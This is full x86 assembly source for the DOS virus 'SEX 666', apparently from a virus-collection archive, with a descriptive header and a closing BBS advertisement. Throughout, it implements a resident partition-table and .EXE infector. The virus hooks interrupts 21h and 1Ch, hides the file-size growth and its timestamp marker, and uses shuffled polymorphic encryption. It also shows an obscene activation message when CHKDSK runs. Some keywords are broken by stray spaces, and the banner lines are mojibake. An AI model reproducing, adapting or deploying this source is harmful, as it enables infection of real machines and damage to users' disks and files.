2022-08-21 09:07:57 +00:00
;------------------------------------------------------------------------------
;
; Virus Name: SEX 666
; Origin: Holland
; Eff Length: 2,048 bytes
; Type Code: PRhE - Parasitic Resident .EXE Infector
;
; General Comments:
; When the first program with SEX 666 is executed, SEX 666 will infect
; this partition table the first harddisk and install itself resident
; at the top of system memory, but below the 640k DOS boundary. Free
; memory as indicated by the DOS CHKDSK program, will decrease by 4112
; bytes. Interrupt 21h will be hooked by the virus.
;
; This first time the computer is booted from the first harddisk SEX 666
; will install itself resident above TOM but below the 640k DOS boundary.
; Total system memory as indicated by the DOS CHKDSK program, will
; decrease by 4096 bytes.
;
; After SEX 666 is resident, it will infect .EXE programs that are
; created with dos function 3ch or 5bh. Infected programs will increase
; in size by 2048 bytes, though the increase in file length will be
; hidden if SEX 666 is resident. The program's time will indicate 62
; seconds, but this will be hidden if the virus is resident.
;
;------------------------------------------------------------------------------
;
; Interrupt vectors
;
;------------------------------------------------------------------------------
iseg seg ment at 0
org 1ch * 4
Int1Co dw 0 ; interrupt vector 21h
Int1Cs dw 0
org 21h * 4
Int21o dw 0 ; interrupt vector 21h
Int21s dw 0
iseg ends
;------------------------------------------------------------------------------
;
; Constants
;
;------------------------------------------------------------------------------
VirusSize equ 800h ; size of virus
BootSize equ 2bh
;------------------------------------------------------------------------------
;
; Macros
;
;------------------------------------------------------------------------------
je_n macro dest ; je >128 bytes
local ok
jne ok
jmp dest
ok:
endm
jne_n macro dest ; jne >128 bytes
local ok
je ok
jmp dest
ok:
endm
db w macro _byte1 , _byte2 , _word
db _byte1 , _byte2
dw offset _word
endm
cseg seg ment public 'code'
assume cs : cs eg , ds : cs eg , es : cs eg
;------------------------------------------------------------------------------
;
; Header of EXE-file
;
;------------------------------------------------------------------------------
Header equ $
Signature dw 5a4dh ; signature 'MZ'
PartPage dw 0 ; size of partitial page
PageCount dw 8 ; number of pages
ReloCount dw 0 ; number of relocation items
HeaderSize dw 2 ; size of header
MinMem dw 40h ; minimum memory needed
MaxMem dw 40h ; maximum memory needed
ExeSS dw 0 ; initial SS
ExeSP dw VirusSize ; initial SP
CheckSum dw 0 ; unused ???
ExeEntry equ this dword ; initial entry point
ExeIP dw offset Start ; initial IP
ExeCS dw 0 ; initial CS
ReloOffset dw 1ch ; offset of relocationtable
OverlayNr dw 0 ; number of overlay
CryptOfs equ OverlayNr ; offset Crypt
org BootSize
;------------------------------------------------------------------------------
;
; Bootsector startup
;
;------------------------------------------------------------------------------
Bootsector:
cli
xor bx , bx
mov ds , bx
mov ss , bx
mov sp , 7c00h
sti
mov ax , ds :[ 413h ]
sub ax ,( VirusSize / 400h )
mov ds :[ 413h ], ax
mov cl , 6
shl ax , cl
mov es , ax
mov ax , 201h + ( VirusSize / 200h )
mov cx , 2
mov dx , 80h
int 13h
mov bx , offset StartUp
push es
push bx
retf
StartUp: cli
mov ax , offset Interrupt1C
xchg ax , ds : Int1Co
mov cs : OldInt1Co , ax
mov ax , cs
xchg ax , ds : Int1Cs
mov cs : OldInt1Cs , ax
mov cs : Count , 182
sti
push ds
pop es
push cs
pop ds
mov si , offset Header
mov di , 7c00h
mov cx , BootSize
cld
rep movsb
mov bx , 7c00h
push es
push bx
retf
Interrupt1C:
dec cs : Count
jne Old1C
push ds
push ax
cli
xor ax , ax
mov ds , ax
mov ax , cs : OldInt1Co
mov ds : Int1Co , ax
mov ax , cs : OldInt1Cs
mov ds : Int1Cs , ax
mov ax , offset Interrupt21
xchg ax , ds : Int21o
mov cs : OldInt21o , ax
mov ax , cs
xchg ax , ds : Int21s
mov cs : OldInt21s , ax
mov cs : Handle1 , 0
mov cs : Handle2 , 0
sti
pop ax
pop ds
Old1C: jmp cs : OldInt1C
;------------------------------------------------------------------------------
;
; Manipilated functions
;
;------------------------------------------------------------------------------
Functions db 11h ; 1
dw offset FindFCB
db 12h ; 2
dw offset FindFCB
db 30h ; 3
dw offset Version
db 3ch ; 4
dw offset Create
db 3dh ; 5
dw offset Open
db 3eh ; 6
dw offset Cl ose
db 42h ; 7
dw offset Seek
db 4bh ; 8
dw offset Exec
db 4eh ; 9
dw offset Find
db 4fh ; a
dw offset Find
db 5bh ; b
dw offset Create
db 6ch ; c
dw offset OpenCreate
FunctionCount equ 0ch
;------------------------------------------------------------------------------
;
; String data
;
;------------------------------------------------------------------------------
MemoryMsg db 'Insufficient memory' , 13 , 10 , '$'
ChkDsk db 'CHKDSK'
;------------------------------------------------------------------------------
;
; Procedure to infect an EXE-file
; At the top of the EXE-file must be space to put the virus.
;
;------------------------------------------------------------------------------
Infect: push ax ; save registers
push bx
push cx
push dx
push ds
push cs ; ds=cs
pop ds
mov ax , 4200h ; position read/write pointer
xor cx , cx ; at the end of the virus
mov dx , VirusSize
call DOS
call ReadHeader ; read orginal exe-header
add PageCount , VirusSize / 200h ; adjust header for virus
mov ReloCount , 0
mov HeaderSize , 0
add MinMem ,( 10h + VirusSize ) / 10h
add MaxMem ,( 10h + VirusSize ) / 10h
jnc MaxOk
mov MaxMem , 0ffffh
MaxOk: add ExeSS , VirusSize / 10h
mov ExeIP , offset Main
mov ExeCS , 0
mov ax , 4200h ; position read/write pointer
xor cx , cx ; at the top of the virus
xor dx , dx
call DOS
call WriteHeader ; write header at the top of
jc InfErr
mov ax , 5700h ; the virus
call DOS
mov ax , 5701h
or cl , 1fh
call DOS
InfErr: pop ds ; restore registers
pop dx
pop cx
pop bx
pop ax
ret ; return
;------------------------------------------------------------------------------
;
; The orginal interrupt 21h is redirected to this procedure
;
;------------------------------------------------------------------------------
FindFCB: call DOS ; call orginal interrupt
cmp al , 0 ; error ?
jne Ret1
pushf ; save registers
push ax
push bx
push es
mov ah , 2fh ; get DTA
call DOS
cmp byte ptr es :[ bx ], - 1 ; extended fcb ?
jne FCBOk
add bx , 8 ; yes, skip 8 bytes
FCBOk: mov al , es :[ bx + 16h ] ; get file-time (low byte)
and al , 1fh ; seconds
cmp al , 1fh ; 62 seconds ?
jne FileOk ; no, file not infected
sub word ptr es :[ bx + 1ch ], VirusSize ; adjust file-size
sbb word ptr es :[ bx + 1eh ], 0
jmp short Time
Find: call DOS ; call orginal interrupt
jc Ret1 ; error ?
pushf ; save registers
push ax
push bx
push es
mov ah , 2fh
call DOS
mov al , es :[ bx + 16h ] ; get file-time (low byte)
and al , 1fh ; seconds
cmp al , 1fh ; 62 seconds ?
jne FileOk ; no, file not infected
sub word ptr es :[ bx + 1ah ], VirusSize ; change file-size
sbb word ptr es :[ bx + 1ch ], 0
Time: xor byte ptr es :[ bx + 16h ], 10h ; adjust file-time
FileOk: pop es ; restore registers
pop bx
pop ax
popf
Ret1: retf 2 ; return
Version: push cx ; installation check
push si ; ds = cs
push di
push es
push cs
pop es
mov si , offset Version ; compare an part of the
mov di , si ; code segment with the code
mov cx , VersionSize ; segment of the virus
cld
repe cmpsb
pop es
pop di
pop si
pop cx
jne Old21 ; not equal, do orginal int 21h
mov ax , 0DEADh ; return DEAD signature
mov bx , offset Continue ; es:dx = continue
push cs
pop es
retf 2 ; return
VersionSize equ $ - Version
Seek: or bx , bx ; bx=0 ?
jz Old21 ; yes, do orginal interrupt
cmp bx , cs : Handle1 ; bx=handle1 ?
je Stealth ; yes, use stealth
cmp bx , cs : Handle2 ; bx=handle2 ?
jne Old21 ; no, do orginal interrupt
Stealth: push cx ; save cx
or al , al ; seek from top of file ?
jnz Ok ; no, don't change cx:dx
add dx , VirusSize ; change cx:dx
adc cx , 0
Ok: call DOS ; Execute orginal int 21h
pop cx ; restore cx
jc Ret1 ; Error ?
sub ax , VirusSize ; adjust dx:ax
sbb dx , 0
jmp short Ret1 ; return
Close: or bx , bx ; bx=0 ?
je Old21 ; yes, do orginal interrupt
cmp bx , cs : Handle1 ; bx=handle1
jne Not1 ; no, check handle2
call Infect ; finish infection
mov cs : Handle1 , 0 ; handle1=unused
Not1: cmp bx , cs : Handle2 ; bx=handle2
jne Not2 ; no, do orginal interrupt
call Infect
mov cs : Handle2 , 0 ; handle2=unused
Not2: jmp short Old21 ; continue with orginal int
Interrupt21:
cmp cs : Di sable , 0
jne Old21
push bx ; after an int 21h instruction
push cx ; this procedure is started
mov bx , offset Functions
mov cx , FunctionCount
NxtFn: cmp ah , cs :[ bx ] ; search function
je Found
add bx , 3
loop NxtFn
pop cx ; function not found
pop bx
Old21: inc cs : Cryptor
jmp cs : OldInt21
Found: push bp ; function found, start viral
mov bp , sp ; version of function
mov bx , cs :[ bx + 1 ]
xchg bx , ss :[ bp + 4 ]
pop bp
pop cx
ret
Create: cmp cs : Handle1 , 0 ; handle1=0 ?
jne Old21 ; No, can't do anything
call Ch eckName ; check for .exe extension
jc Old21 ; No, not an exe-file
ExtCr: call DOS ; Execute orginal interrupt
jc Ret2 ; Error ?
pushf ; save registers
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push cs
pop ds
push cs
pop es
mov bx , ax ; write virus to file
mov ax , 4400h
call DOS
jc InRet
test dx , 80h
jnz InRet
push bx
call Link
pop bx
mov si , offset WriteVirus
mov di , offset Header
mov cx , 1ah
rep movsb
mov CryptOfs , offset Crypt
call Header
jc InErr ; Error ?
cmp ax , cx
jne InErr
mov Handle1 , bx ; store handle
jmp short InRet
InErr: mov ax , 4200h ; set read/write pointer to top
xor cx , cx ; of file
xor dx , dx
call DOS
mov ah , 40h
xor cx , cx
call DOS
InRet: pop es ; restore registers
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
Ret2: retf 2 ; return
OpenCreate:
or al , al ; subfunction 0 ?
jne Fail ; no, do orginal interrupt
push dx
and dl , 0f0h
cmp dl , 020h
pop dx
je Replace
push ax ; save registers
push bx
push cx
push dx
mov ax , 3d00h ; open file and close file to
mov dx , si ; check if file exists
call DOS
jc Error
mov bx , ax
mov ah , 3eh
call DOS
Error: pop dx ; restore registers
pop cx
pop bx
pop ax
jnc Open ; open file, if file exists
Replace: cmp cs : Handle1 , 0 ; is handle1 0 ?
jne Fail ; no, do orginal interrupt
push dx ; save dx
mov dx , si
call Ch eckName ; check for .exe extension
pop dx ; restore dx
jc Fail
jmp ExtCr ; create if exe-file
Fail: jmp Old21 ; do orginal interrupt
Open: cmp al , 1
je Fail
cmp cs : Handle2 , 0 ; handle1=0 ?
jne Fail ; No, can't do anything
call DOS ; Execute orginal interrupt
jc Ret3 ; Error ?
pushf ; save registers
push ax
push bx
push cx
push dx
push ds
push cs
pop ds
mov bx , ax ; read header of file
Ext2: mov ax , 4400h
call DOS
jc Device
test dx , 80h
jnz Device
mov ah , 3fh
mov cx , 1ch
xor dx , dx
call DOS
jc NoVir ; error ?
cmp ax , cx
jne NoVir
cmp Si gnature , 5a4dh ; signature = 'MZ' ?
jne NoVir ; no, not infected
cmp HeaderSize , 0 ; headersize = 0 ?
jne NoVir ; no, not infected
cmp ExeIP , offset Main ; ip = Start ?
jne NoVir ; no, not infected
cmp ExeCS , 0 ; cx = 0 ?
jne NoVir ; no, not infected
mov Handle2 , bx ; store handle
mov ax , 4200h
xor cx , cx
mov dx , VirusSize ; seek to end of virus
jmp OpenOk
NoVir: mov ax , 4200h
xor cx , cx
xor dx , dx
OpenOk: call DOS
Device: pop ds ; restore registers
pop dx
pop cx
pop bx
pop ax
popf
Ret3: retf 2 ; return
Exec: push ax
push cx
push si
push di
mov si , dx
mov di , offset Ch kDsk
mov cx , 100h
Next7: jcxz NotChk
mov ah , cs :[ di ]
Next8: lodsb
and al , 0dfh
cmp al , ah
loopne Next8
push cx
push si
push di
mov cx , 6
dec si
Next9: lodsb
and al , 0dfh
inc di
cmp cs :[ di - 1 ], al
loope Next9
pop di
pop si
pop cx
jne Next7
cmp cs : Cryptor , 1000h
jae NoMsg
push dx
push ds
push cs
pop ds
mov ah , 9
mov dx , offset TextLine
call DOS
mov ah , 9
mov dx , offset Message
call DOS
pop ds
pop dx
NoMsg: pop di
pop si
pop cx
pop ax
inc cs : Di sable
call DOS
dec cs : Di sable
jmp Ret3
NotChk: pop di
pop si
pop cx
pop ax
jmp Old21
;------------------------------------------------------------------------------
WriteVirus:
call CryptOfs ; encrypt
mov ah , 40h ; write virus to file
mov cx , VirusSize
xor dx , dx
pushf
call cs : OldInt21
call CryptOfs ; decrypt
ret ; return
WriteHeader: ; write exe-header to file
mov ah , 40h
jmp short Hdr
ReadHeader: ; read exe-header from file
mov ah , 3fh
Hdr: mov cx , 1ch
xor dx , dx
DOS: pushf ; call orginal interrupt
call cs : OldInt21
ret
CheckName: ; check for .exe
push ax ; save registers
push cx
push si
push di
xor ah , ah ; point found = 0
mov cx , 100h ; max length filename = 100h
mov si , dx ; si = start of filename
cld
NxtChr: lodsb ; get byte
or al , al ; 0 ?
je EndName ; yes, check extension
cmp al , '\' ; \ ?
je Slash ; yes, point found = 0
cmp al , '.' ; . ?
je Point ; yes, point found = 1
loop NxtChr ; next character
jmp EndName ; check extension
Slash: xor ah , ah ; point found = 0
jmp NxtChr ; next character
Point: inc ah ; point found = 1
mov di , si ; di = start of extension
jmp NxtChr ; next character
EndName: or ah , ah ; point found = 0
je NotExe ; yes, not an exe-file
mov si , di ; si = start of extension
lodsw ; first 2 characters
and ax , 0dfdfh ; uppercase
cmp ax , 05845h ; EX ?
jne NotExe ; no, not an exe-file
lodsb ; 3rd character
and al , 0dfh ; uppercase
cmp al , 045h ; E ?
je Ch kRet ; yes, return
NotExe: stc ; set carry flag
ChkRet: pop di ; restore registers
pop si
pop cx
pop ax
ret ; return
;------------------------------------------------------------------------------
;
; Linker for encryption procedure
;
;------------------------------------------------------------------------------
Part1 db 7 , 0
db 1 , 09ch
db 1 , 050h
db 1 , 051h
db 1 , 052h
db 1 , 056h
db 1 , 057h
db 1 , 01eh
Part2 db 4 , 0
db 2 , 00eh , 01fh
db 2 , 031h , 0c0h
db w 3 , 0bah , Crypt - 1ch
db w 3 , 0bfh ,[ 1ch ]
Part3 db 1 , 0
db 3 , 0fch , 0ebh , 00eh
Part4 db 4 , 0
db 1 , 0ach
db 2 , 002h , 0e0h
db 2 , 0d0h , 0cch
db 3 , 030h , 025h , 047h
Part5 db 1 , 0
db 2 , 0e2h , 0f6h
Part6 db 1 , 0
db 4 , 00bh , 0d2h , 074h , 010h
Part7 db 2 , 0
db w 3 , 0beh , Crypt
db w 3 , 0b9h , Lastbyte - Crypt
Part8 db 1 , 0
db 10 , 03bh , 0d1h , 073h , 002h , 08bh
db 0cah , 02bh , 0d1h , 0ebh , 0e2h
Part9 db 7 , 1
db 1 , 09dh
db 1 , 058h
db 1 , 059h
db 1 , 05ah
db 1 , 05eh
db 1 , 05fh
db 1 , 01fh
Part10 db 1 , 0
db 1 , 0c3h
Link: mov ax , Cryptor
mov cx , 10 ; number of parts
mov di , offset Crypt ; destenation
mov si , offset Part1 ; source
Next1: push ax ; save registers
push cx
push di
cld
cmp byte ptr ds :[ si + 1 ], 0
je Forward
push ax
push cx
push si
xor ax , ax
mov cl ,[ si ]
xor ch , ch
add si , 2
Next4: lodsb
add si , ax
add di , ax
loop Next4
dec di
std
pop si
pop cx
pop ax
Forward: mov Table [ 0 ], 0100h ; initialize table
mov Table [ 2 ], 0302h
mov Table [ 4 ], 0504h
mov Table [ 6 ], 0706h
mov bx , offset Table
mov cl , ds :[ si ] ; get number of instructions
xor ch , ch ; to shuffle
Next2: call Shuffle
loop Next2
pop di
mov cl , ds :[ si ] ; get next part
xor ch , ch
add si , 2
cld
Next6: lodsb
xor ah , ah
add si , ax
add di , ax
loop Next6
pop cx ; restore register
pop ax
loop Next1 ; next
ret ; return
Shuffle: xor dx , dx ; shuffle instructions
div cx
push ax
push cx
push si
xchg si , dx
mov al , ds :[ bx ]
xchg al , ds :[ bx + si ]
xchg si , dx
inc bx
pushf
cld
mov cl , al
xor ax , ax
xor ch , ch
add si , 2
jcxz First
Next5: lodsb
add si , ax
loop Next5
First: lodsb
xor ah , ah
mov cx , ax
popf
rep movsb
pop si
pop cx
pop ax
ret
;------------------------------------------------------------------------------
;
; This procedure is called when starting from an exe-file
;
;------------------------------------------------------------------------------
MemErr: mov ah , 9 ; display message
mov dx , offset MemoryMsg
int 21h
mov ax , 4cffh ; terminate with error-code 255
int 21h
Start: mov cs : SavedAX , ax ; save registers
mov cs : SavedDS , ds
push cs ; ds = cs
pop ds
mov ah , 30h ; get dos-version (installation
int 21h ; check)
cmp ax , 0DEADh ; virus installed ?
jne Install ; no, install
cmp bx , offset Continue
jne Install
mov ax , ds : SavedAX
mov es : SavedAX , ax
mov ax , ds : SavedDS
mov es : SavedDS , ax
push es ; push es and dx for far return
push bx
mov ax , cs ; ax=distenation segment
mov dx , cs ; dx=segment of orginal header
add dx , VirusSize / 10h
retf ; start orginal exe-file
Install: mov ah , 4ah ; get memory avail
mov bx , - 1
int 21h
sub bx ,( 10h + VirusSize ) / 10h ; memory needed by virus
mov ah , 4ah ; adjust memory block-size
int 21h
jc MemErr ; error ? yes, terminate
mov ah , 48h ; allocate memory for virus
mov bx , VirusSize / 10h
int 21h
jc MemErr ; error ? yes, terminate
mov es , ax
mov ax , 201h
xor bx , bx
mov cx , 1
mov dx , 80h
int 13h
jc BootOk
mov si , offset BootSector
xor di , di
mov cx , BootSize
cld
repe cmpsb
je BootOk
mov di , 1beh + 8
mov cx , 4
Next3: cmp word ptr es :[ di + 2 ], 0
ja SectOk
cmp word ptr es :[ di ], 1 + ( VirusSize / 200h )
jbe BootOk
SectOk: loop Next3
push ds
push es
push es
pop ds
push cs
pop es
xor si , si
xor di , di
mov cx , BootSize
cld
rep movsb
mov ax , 300h + ( VirusSize / 200h )
mov cx , 2
int 13h
pop es
pop ds
jc BootOk
mov si , offset BootSector
xor di , di
mov cx , BootSize
cld
rep movsb
mov ax , 301h
mov cx , 1
int 13h
BootOk: mov ax , es
dec ax ; get segment of MCB
mov es , ax
mov word ptr es :[ 1 ], 8 ; change owner
inc ax ; get segment of memory-block
mov es , ax ; es:dx = continue
mov dx , offset Continue
push es ; push es and ds for far return
push dx
xor si , si ; copy virus to memory-block
xor di , di
mov cx , VirusSize / 2
cld
rep movsw
xor ax , ax ; ds = interrupt table
mov ds , ax
mov ax , ds : Int21o ; save interrupt 21h vector
mov es : OldInt21o , ax
mov ax , ds : Int21s
mov es : OldInt21s , ax
mov ds : Int21o , offset Interrupt21 ; store new interrupt vector
mov ds : Int21s , es
mov es : Handle1 , 0 ; clear handles
mov es : Handle2 , 0
push cs
pop ds
mov ax , cs ; ax=distenation segment
mov dx , cs ; dx=segment of orginal header
add dx , VirusSize / 10h
retf ; start orginal exe-file
Continue:
mov ds , dx ; ds=dx
add ExeSS , ax ; adjust orginal SS
add ExeCS , ax ; adjust orginal CS
xor si , si ; copy orginal header to
xor di , di ; code segment
mov cx , 0dh
cld
rep movsw
mov si , ReloOffset ; get offset of relocationtable
mov cx , ReloCount ; get number of relocationitems
add dx , HeaderSize ; get start of orginal exe-file
cld
jcxz Zero ; 0 relocation items ?
Next: push ax ; save ax
lodsw ; get offset of relocationitem
mov bx , ax
lodsw ; get segment of relocationitem
add ax , dx
mov es , ax
pop ax
add es :[ bx ], ax ; adjust relocationitem
loop Next ; next relocationitem
Zero: mov bx , PageCount ; get number of pages in file
cli ; disable interrupts
NxtPage: mov ds , dx ; ds = source segment
mov es , ax ; es = destenation segment
mov cx , 100h ; cx = size of 1 page in words
xor si , si ; si = 0
xor di , di ; di = 0
rep movsw ; copy block
add ax , 20h ; adjust destenation segment
add dx , 20h ; adjust source segment
dec bx ; restore cx
jnz NxtPage ; next block
mov ss , cs : ExeSS ; set ss:sp
mov sp , cs : ExeSP
sti ; enable interrupts
mov ax , cs : SavedAX ; restore registers
mov ds , cs : SavedDS
mov es , cs : SavedDS
jmp cs : ExeEntry
;------------------------------------------------------------------------------
;
; Activation
;
;------------------------------------------------------------------------------
Message equ this byte
db 9 , 9 , 9 , 9 , ' SEX 666' , 13 , 10
db 9 , 9 , 9 , 9 , ' Fuck the Demon' , 13 , 10
db 13 , 10
db 9 , 9 , 9 , 9 , ' Greetings Bit Addict' , 13 , 10
TextLine equ this byte
db 13 , 10
db 9 , 9 , 9 , 9 , '<27> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> ' , 13 , 10
db 13 , 10
db '$'
;------------------------------------------------------------------------------
;
; Encryption
;
;------------------------------------------------------------------------------
Crypt: db 58 dup ( 90h ) ; this should be the encryption
Cryptor dw 0 ; change the encryption by
; changing this value
Main: call Crypt ; decrypt
jmp Start ; jump to Start
LastByte equ $ ; encryption stops here
;------------------------------------------------------------------------------
;
; Variables
;
;------------------------------------------------------------------------------
OldInt1C equ this dword ; orginal interrupt 8
OldInt1Co dw 0
OldInt1Cs dw 0
OldInt21 equ this dword ; orginal interrupt 21h
OldInt21o dw 0
OldInt21s dw 0
Disable db 0
Count equ this word ; timer count
SavedAX dw 0
SavedDS dw 0
Handle1 dw - 1 ; Handle of exe-file created
Handle2 dw - 1 ; Handle of exe-file opend
Table dw 0 , 0 , 0 , 0 ; Used by link
;------------------------------------------------------------------------------
;
; Orginal EXE-file
;
;------------------------------------------------------------------------------
org VirusSize
db 'MZ' ; header
dw 0 ; image size = 1024 bytes
dw 4
dw 0 ; relocation items = 0
dw 2 ; headersize = 20h
dw 40h ; minimum memory
dw 40h ; maximum memory
dw 0 ; ss
dw 400h ; sp
dw 0 ; chksum
dw 0 ; ip
dw 0 ; cs
dw 1ch ; offset relocation table
dw 0 ; overlay number
dw - 1
dw - 1
Orginal: mov ah , 9 ; display warning
push cs
pop ds
mov dx , offset Warning - VirusSize - 20h
int 21h
mov ax , 4c00h
int 21h ; terminate
Warning equ this byte
db 13 , 10
db 'WARNING:' , 13 , 10
db 13 , 10
db 'SEX 666 virus is now memory resident and has now infected the' , 13 , 10
db 'partition table !!!!!' , 13 , 10
db 13 , 10
db '$'
cseg ends
sseg seg ment stack 'stack'
db 100h dup ( ? )
sseg ends
end Start
�
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> > and Remember Don't Forget to Call <<3C> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
